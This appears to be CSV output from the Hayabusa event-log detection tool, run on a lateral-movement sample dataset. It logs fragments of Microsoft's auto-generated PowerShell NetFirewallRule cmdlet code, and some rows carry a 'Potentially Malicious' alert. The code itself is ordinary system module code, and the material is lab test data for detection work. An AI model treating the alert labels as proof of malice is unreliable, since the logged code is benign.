'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} 
} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 
= $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
